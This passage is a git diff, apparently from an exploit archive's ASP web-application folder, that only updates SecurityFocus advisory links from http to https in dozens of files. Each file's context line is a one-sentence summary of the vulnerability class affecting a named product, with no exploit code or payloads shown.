https://www.securityfocus.com/bid/32572/info Pre ASP Job Board is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32635.txt b/exploits/asp/webapps/32635.txt index a66905f2f..3b9904361 100644 --- a/exploits/asp/webapps/32635.txt +++ b/exploits/asp/webapps/32635.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32599/info +source: https://www.securityfocus.com/bid/32599/info Jbook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32653.txt b/exploits/asp/webapps/32653.txt index 3aa098ceb..03c843e89 100644 --- a/exploits/asp/webapps/32653.txt +++ b/exploits/asp/webapps/32653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32706/info +source: https://www.securityfocus.com/bid/32706/info Professional Download Assistant is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32658.txt b/exploits/asp/webapps/32658.txt index 078054866..6993101fd 100644 --- a/exploits/asp/webapps/32658.txt +++ b/exploits/asp/webapps/32658.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32809/info +source: https://www.securityfocus.com/bid/32809/info ASP-DEV XM Events Diary is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32683.txt b/exploits/asp/webapps/32683.txt index 417dfce67..f58ac82cd 100644 --- a/exploits/asp/webapps/32683.txt +++ b/exploits/asp/webapps/32683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33041/info +source: https://www.securityfocus.com/bid/33041/info Mavi Emlak is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32687.txt b/exploits/asp/webapps/32687.txt index 55e80f3ca..5d9c32770 100644 --- a/exploits/asp/webapps/32687.txt +++ b/exploits/asp/webapps/32687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33045/info +source: https://www.securityfocus.com/bid/33045/info Madrese-Portal is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/32716.html b/exploits/asp/webapps/32716.html index 02d0a1b7b..37702f5ac 100644 --- a/exploits/asp/webapps/32716.html +++ b/exploits/asp/webapps/32716.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33217/info +source: https://www.securityfocus.com/bid/33217/info Comersus Cart is prone to a vulnerability that can result in unauthorized access. diff --git a/exploits/asp/webapps/32729.txt b/exploits/asp/webapps/32729.txt index 34412d1fe..eb582ca04 100644 --- a/exploits/asp/webapps/32729.txt +++ b/exploits/asp/webapps/32729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33305/info +source: https://www.securityfocus.com/bid/33305/info LinksPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32730.txt b/exploits/asp/webapps/32730.txt index d8855a826..506151700 100644 --- a/exploits/asp/webapps/32730.txt +++ b/exploits/asp/webapps/32730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33306/info +source: https://www.securityfocus.com/bid/33306/info Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32731.txt b/exploits/asp/webapps/32731.txt index d2f08f2f9..e06357420 100644 --- a/exploits/asp/webapps/32731.txt +++ b/exploits/asp/webapps/32731.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33306/info +source: https://www.securityfocus.com/bid/33306/info Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32735.txt b/exploits/asp/webapps/32735.txt index d0ffa608d..6d7da05a3 100644 --- a/exploits/asp/webapps/32735.txt +++ b/exploits/asp/webapps/32735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33314/info +source: https://www.securityfocus.com/bid/33314/info DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/32736.txt b/exploits/asp/webapps/32736.txt index 9c86c2893..23b74f6bb 100644 --- a/exploits/asp/webapps/32736.txt +++ b/exploits/asp/webapps/32736.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33314/info +source: https://www.securityfocus.com/bid/33314/info DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/32748.txt b/exploits/asp/webapps/32748.txt index 97473579a..6811ed365 100644 --- a/exploits/asp/webapps/32748.txt +++ b/exploits/asp/webapps/32748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33411/info +source: https://www.securityfocus.com/bid/33411/info BBSXP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32750.txt b/exploits/asp/webapps/32750.txt index 8c3ff5dac..87889ff5a 100644 --- a/exploits/asp/webapps/32750.txt +++ b/exploits/asp/webapps/32750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33416/info +source: https://www.securityfocus.com/bid/33416/info OBLOG is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32756.txt b/exploits/asp/webapps/32756.txt index 2806e4193..918c48d4d 100644 --- a/exploits/asp/webapps/32756.txt +++ b/exploits/asp/webapps/32756.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33431/info +source: https://www.securityfocus.com/bid/33431/info LDF is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32758.txt b/exploits/asp/webapps/32758.txt index ab285c406..4f3956cd3 100644 --- a/exploits/asp/webapps/32758.txt +++ b/exploits/asp/webapps/32758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33439/info +source: https://www.securityfocus.com/bid/33439/info Lootan is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32797.txt b/exploits/asp/webapps/32797.txt index 61614c3ef..67d6ee176 100644 --- a/exploits/asp/webapps/32797.txt +++ b/exploits/asp/webapps/32797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33721/info +source: https://www.securityfocus.com/bid/33721/info Banking@Home is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32833.txt b/exploits/asp/webapps/32833.txt index 4d4ca6799..8377eada3 100644 --- a/exploits/asp/webapps/32833.txt +++ b/exploits/asp/webapps/32833.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33957/info +source: https://www.securityfocus.com/bid/33957/info Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32874.txt b/exploits/asp/webapps/32874.txt index 94968465f..ce28e0d79 100644 --- a/exploits/asp/webapps/32874.txt +++ b/exploits/asp/webapps/32874.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34227/info +source: https://www.securityfocus.com/bid/34227/info BlogEngine.NET is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/32882.txt b/exploits/asp/webapps/32882.txt index 932f84f9e..718b306f7 100644 --- a/exploits/asp/webapps/32882.txt +++ b/exploits/asp/webapps/32882.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34341/info +source: https://www.securityfocus.com/bid/34341/info SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/32888.txt b/exploits/asp/webapps/32888.txt index d1459594e..2c556b3ba 100644 --- a/exploits/asp/webapps/32888.txt +++ b/exploits/asp/webapps/32888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34349/info +source: https://www.securityfocus.com/bid/34349/info Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/32898.txt b/exploits/asp/webapps/32898.txt index aec897c40..c2f8388b3 100644 --- a/exploits/asp/webapps/32898.txt +++ b/exploits/asp/webapps/32898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34463/info +source: https://www.securityfocus.com/bid/34463/info Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32903.txt b/exploits/asp/webapps/32903.txt index 78f3f3e04..a1bd515cc 100644 --- a/exploits/asp/webapps/32903.txt +++ b/exploits/asp/webapps/32903.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34491/info +source: https://www.securityfocus.com/bid/34491/info People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/32953.vbs b/exploits/asp/webapps/32953.vbs index 7ec016801..d52477701 100644 --- a/exploits/asp/webapps/32953.vbs +++ b/exploits/asp/webapps/32953.vbs @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34701/info +source: https://www.securityfocus.com/bid/34701/info PJBlog3 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33009.txt b/exploits/asp/webapps/33009.txt index e980368c5..759be648d 100644 --- a/exploits/asp/webapps/33009.txt +++ b/exploits/asp/webapps/33009.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35074/info +source: https://www.securityfocus.com/bid/35074/info DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33171.txt b/exploits/asp/webapps/33171.txt index 9e4e4a731..47a3ee881 100644 --- a/exploits/asp/webapps/33171.txt +++ b/exploits/asp/webapps/33171.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36049/info +source: https://www.securityfocus.com/bid/36049/info DUgallery is prone to an authentication-bypass vulnerability. diff --git a/exploits/asp/webapps/33236.txt b/exploits/asp/webapps/33236.txt index e540f8309..5af5715f9 100644 --- a/exploits/asp/webapps/33236.txt +++ b/exploits/asp/webapps/33236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36480/info +source: https://www.securityfocus.com/bid/36480/info MaxWebPortal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33268.html b/exploits/asp/webapps/33268.html index f41d084e7..b0bd1fbbe 100644 --- a/exploits/asp/webapps/33268.html +++ b/exploits/asp/webapps/33268.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36605/info +source: https://www.securityfocus.com/bid/36605/info AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33361.txt b/exploits/asp/webapps/33361.txt index 2dbf18571..16177012e 100644 --- a/exploits/asp/webapps/33361.txt +++ b/exploits/asp/webapps/33361.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37045/info +source: https://www.securityfocus.com/bid/37045/info Multiple JiRo's products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33647.txt b/exploits/asp/webapps/33647.txt index 143e8a351..9f4430b4a 100644 --- a/exploits/asp/webapps/33647.txt +++ b/exploits/asp/webapps/33647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38252/info +source: https://www.securityfocus.com/bid/38252/info Portrait Campaign Manager is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33704.txt b/exploits/asp/webapps/33704.txt index 7e5d04e6c..d9e41b155 100644 --- a/exploits/asp/webapps/33704.txt +++ b/exploits/asp/webapps/33704.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38542/info +source: https://www.securityfocus.com/bid/38542/info BBSXP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33715.txt b/exploits/asp/webapps/33715.txt index 266eda89b..a470a2895 100644 --- a/exploits/asp/webapps/33715.txt +++ b/exploits/asp/webapps/33715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38573/info +source: https://www.securityfocus.com/bid/38573/info Spectrum Software WebManager CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33720.txt b/exploits/asp/webapps/33720.txt index 24fec50ac..45c46d4e2 100644 --- a/exploits/asp/webapps/33720.txt +++ b/exploits/asp/webapps/33720.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38582/info +source: https://www.securityfocus.com/bid/38582/info Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33721.txt b/exploits/asp/webapps/33721.txt index c056c654d..134a9a7c1 100644 --- a/exploits/asp/webapps/33721.txt +++ b/exploits/asp/webapps/33721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38592/info +source: https://www.securityfocus.com/bid/38592/info Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33722.txt b/exploits/asp/webapps/33722.txt index 4c1cda04f..b418f955c 100644 --- a/exploits/asp/webapps/33722.txt +++ b/exploits/asp/webapps/33722.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38601/info +source: https://www.securityfocus.com/bid/38601/info ASPCode CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33728.txt b/exploits/asp/webapps/33728.txt index 5ca94be9f..378f01407 100644 --- a/exploits/asp/webapps/33728.txt +++ b/exploits/asp/webapps/33728.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38612/info +source: https://www.securityfocus.com/bid/38612/info IBM ENOVIA SmarTeam is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33730.txt b/exploits/asp/webapps/33730.txt index 7c91f5551..5773072c7 100644 --- a/exploits/asp/webapps/33730.txt +++ b/exploits/asp/webapps/33730.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38630/info +source: https://www.securityfocus.com/bid/38630/info Max Network Technology BBSMAX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/33758.txt b/exploits/asp/webapps/33758.txt index 8e910604f..3ed8db79a 100644 --- a/exploits/asp/webapps/33758.txt +++ b/exploits/asp/webapps/33758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38719/info +source: https://www.securityfocus.com/bid/38719/info Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33761.txt b/exploits/asp/webapps/33761.txt index 1f346f0cd..d27752d39 100644 --- a/exploits/asp/webapps/33761.txt +++ b/exploits/asp/webapps/33761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38734/info +source: https://www.securityfocus.com/bid/38734/info Pars CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33825.txt b/exploits/asp/webapps/33825.txt index e215b9e49..d2402e3bd 100644 --- a/exploits/asp/webapps/33825.txt +++ b/exploits/asp/webapps/33825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39311/info +source: https://www.securityfocus.com/bid/39311/info Ziggurat Farsi CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/33840.txt b/exploits/asp/webapps/33840.txt index e8eac175c..f837f97a0 100644 --- a/exploits/asp/webapps/33840.txt +++ b/exploits/asp/webapps/33840.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39534/info +source: https://www.securityfocus.com/bid/39534/info Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/33923.txt b/exploits/asp/webapps/33923.txt index dc5e56a1d..396e82cee 100644 --- a/exploits/asp/webapps/33923.txt +++ b/exploits/asp/webapps/33923.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39892/info +source: https://www.securityfocus.com/bid/39892/info SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/33959.txt b/exploits/asp/webapps/33959.txt index 5fae58c30..11b3a8e8d 100644 --- a/exploits/asp/webapps/33959.txt +++ b/exploits/asp/webapps/33959.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39999/info +source: https://www.securityfocus.com/bid/39999/info Multiple Consona (formerly SupportSoft) products are prone to a cross-site scripting vulnerability. diff --git a/exploits/asp/webapps/33992.txt b/exploits/asp/webapps/33992.txt index 94a317185..83726a821 100644 --- a/exploits/asp/webapps/33992.txt +++ b/exploits/asp/webapps/33992.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40201/info +source: https://www.securityfocus.com/bid/40201/info Platnik is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34034.txt b/exploits/asp/webapps/34034.txt index 943a1bebc..c7af38730 100644 --- a/exploits/asp/webapps/34034.txt +++ b/exploits/asp/webapps/34034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40357/info +source: https://www.securityfocus.com/bid/40357/info cyberhost is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34180.txt b/exploits/asp/webapps/34180.txt index 983b31aa0..aabdb0a49 100644 --- a/exploits/asp/webapps/34180.txt +++ b/exploits/asp/webapps/34180.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41042/info +source: https://www.securityfocus.com/bid/41042/info webConductor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34194.txt b/exploits/asp/webapps/34194.txt index df00d4d03..ff5ced8eb 100644 --- a/exploits/asp/webapps/34194.txt +++ b/exploits/asp/webapps/34194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41124/info +source: https://www.securityfocus.com/bid/41124/info Lois Software WebDB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34221.txt b/exploits/asp/webapps/34221.txt index b307bed02..44f482453 100644 --- a/exploits/asp/webapps/34221.txt +++ b/exploits/asp/webapps/34221.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41224/info +source: https://www.securityfocus.com/bid/41224/info Iatek PortalApp is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34343.txt b/exploits/asp/webapps/34343.txt index d6d41d8b6..379b1bbbe 100644 --- a/exploits/asp/webapps/34343.txt +++ b/exploits/asp/webapps/34343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41746/info +source: https://www.securityfocus.com/bid/41746/info MOJO IWMS is prone to a cookie-manipulation vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34344.txt b/exploits/asp/webapps/34344.txt index 313cacfef..53391dcf2 100644 --- a/exploits/asp/webapps/34344.txt +++ b/exploits/asp/webapps/34344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41747/info +source: https://www.securityfocus.com/bid/41747/info Pre Jobo.NET is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/34376.txt b/exploits/asp/webapps/34376.txt index eaa427105..7b1eec54c 100644 --- a/exploits/asp/webapps/34376.txt +++ b/exploits/asp/webapps/34376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41970/info +source: https://www.securityfocus.com/bid/41970/info e-Courier CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34380.txt b/exploits/asp/webapps/34380.txt index 582ec8947..1d5d43ed0 100644 --- a/exploits/asp/webapps/34380.txt +++ b/exploits/asp/webapps/34380.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41995/info +source: https://www.securityfocus.com/bid/41995/info Active Business Directory is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34397.txt b/exploits/asp/webapps/34397.txt index 881040edd..c418f4c32 100644 --- a/exploits/asp/webapps/34397.txt +++ b/exploits/asp/webapps/34397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42164/info +source: https://www.securityfocus.com/bid/42164/info Activedition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34411.txt b/exploits/asp/webapps/34411.txt index d0f75f6e1..d18e7a415 100644 --- a/exploits/asp/webapps/34411.txt +++ b/exploits/asp/webapps/34411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42243/info +source: https://www.securityfocus.com/bid/42243/info DT Centrepiece is prone to multiple cross-site scripting vulnerabilities and multiple security-bypass vulnerabilities. diff --git a/exploits/asp/webapps/34429.txt b/exploits/asp/webapps/34429.txt index baae74216..9814ec3d1 100644 --- a/exploits/asp/webapps/34429.txt +++ b/exploits/asp/webapps/34429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42320/info +source: https://www.securityfocus.com/bid/42320/info Allinta CMS is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34492.txt b/exploits/asp/webapps/34492.txt index 7ca63215d..9af1fef5d 100644 --- a/exploits/asp/webapps/34492.txt +++ b/exploits/asp/webapps/34492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42535/info +source: https://www.securityfocus.com/bid/42535/info Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34614.txt b/exploits/asp/webapps/34614.txt index f57f27452..1b2b99b3f 100644 --- a/exploits/asp/webapps/34614.txt +++ b/exploits/asp/webapps/34614.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43110/info +source: https://www.securityfocus.com/bid/43110/info SmarterTools SmarterStats is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/34687.txt b/exploits/asp/webapps/34687.txt index 6dd662938..c9d921386 100644 --- a/exploits/asp/webapps/34687.txt +++ b/exploits/asp/webapps/34687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43370/info +source: https://www.securityfocus.com/bid/43370/info Smart ASP Survey is prone to a SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/34936.txt b/exploits/asp/webapps/34936.txt index 46b6df6d6..d574e1c39 100644 --- a/exploits/asp/webapps/34936.txt +++ b/exploits/asp/webapps/34936.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44467/info +source: https://www.securityfocus.com/bid/44467/info i-Gallery is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/34948.txt b/exploits/asp/webapps/34948.txt index f3583d25b..e4eb55ca5 100644 --- a/exploits/asp/webapps/34948.txt +++ b/exploits/asp/webapps/34948.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44594/info +source: https://www.securityfocus.com/bid/44594/info Douran Portal is prone to an arbitrary-file-upload vulnerability and a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/34971.txt b/exploits/asp/webapps/34971.txt index c4bffd067..db677fda7 100644 --- a/exploits/asp/webapps/34971.txt +++ b/exploits/asp/webapps/34971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44689/info +source: https://www.securityfocus.com/bid/44689/info Angel Learning Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35031.txt b/exploits/asp/webapps/35031.txt index d3249a66f..0ebba0b56 100644 --- a/exploits/asp/webapps/35031.txt +++ b/exploits/asp/webapps/35031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45121/info +source: https://www.securityfocus.com/bid/45121/info BugTracker.NET is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35045.txt b/exploits/asp/webapps/35045.txt index fe9e3d0a5..89527d82b 100644 --- a/exploits/asp/webapps/35045.txt +++ b/exploits/asp/webapps/35045.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45180/info +source: https://www.securityfocus.com/bid/45180/info DotNetNuke is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35048.txt b/exploits/asp/webapps/35048.txt index 4c910c45b..f159369b3 100644 --- a/exploits/asp/webapps/35048.txt +++ b/exploits/asp/webapps/35048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45201/info +source: https://www.securityfocus.com/bid/45201/info Techno Dreams Articles & Papers Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/35049.txt b/exploits/asp/webapps/35049.txt index 8b5412bf5..a3f9327be 100644 --- a/exploits/asp/webapps/35049.txt +++ b/exploits/asp/webapps/35049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45202/info +source: https://www.securityfocus.com/bid/45202/info Techno Dreams FAQ Manager Package is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/asp/webapps/35065.txt b/exploits/asp/webapps/35065.txt index 5ee897dab..54350f0bb 100644 --- a/exploits/asp/webapps/35065.txt +++ b/exploits/asp/webapps/35065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45257/info +source: https://www.securityfocus.com/bid/45257/info SolarWinds Orion NPM is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35168.txt b/exploits/asp/webapps/35168.txt index 20cc7e959..f7f0219e4 100644 --- a/exploits/asp/webapps/35168.txt +++ b/exploits/asp/webapps/35168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45681/info +source: https://www.securityfocus.com/bid/45681/info BlogEngine.NET is prone to a directory-traversal vulnerability and an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/asp/webapps/35310.txt b/exploits/asp/webapps/35310.txt index 4655c6bcb..76a6954ec 100644 --- a/exploits/asp/webapps/35310.txt +++ b/exploits/asp/webapps/35310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46131/info +source: https://www.securityfocus.com/bid/46131/info Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/asp/webapps/35411.txt b/exploits/asp/webapps/35411.txt index 8b86b5bbc..4f7c791e5 100644 --- a/exploits/asp/webapps/35411.txt +++ b/exploits/asp/webapps/35411.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46762/info +source: https://www.securityfocus.com/bid/46762/info Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35412.txt b/exploits/asp/webapps/35412.txt index 676282913..15c42bc50 100644 --- a/exploits/asp/webapps/35412.txt +++ b/exploits/asp/webapps/35412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46762/info +source: https://www.securityfocus.com/bid/46762/info Kodak InSite is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/asp/webapps/35576.txt b/exploits/asp/webapps/35576.txt index e9d44e704..877efc769 100644 --- a/exploits/asp/webapps/35576.txt +++ b/exploits/asp/webapps/35576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47266/info +source: https://www.securityfocus.com/bid/47266/info Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/asp/webapps/35599.txt b/exploits/asp/webapps/35599.txt index 47bd101a8..8ea2174ea 100644 --- a/exploits/asp/webapps/35599.txt +++ b/exploits/asp/webapps/35599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47291/info +source: https://www.securityfocus.com/bid/47291/info Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git 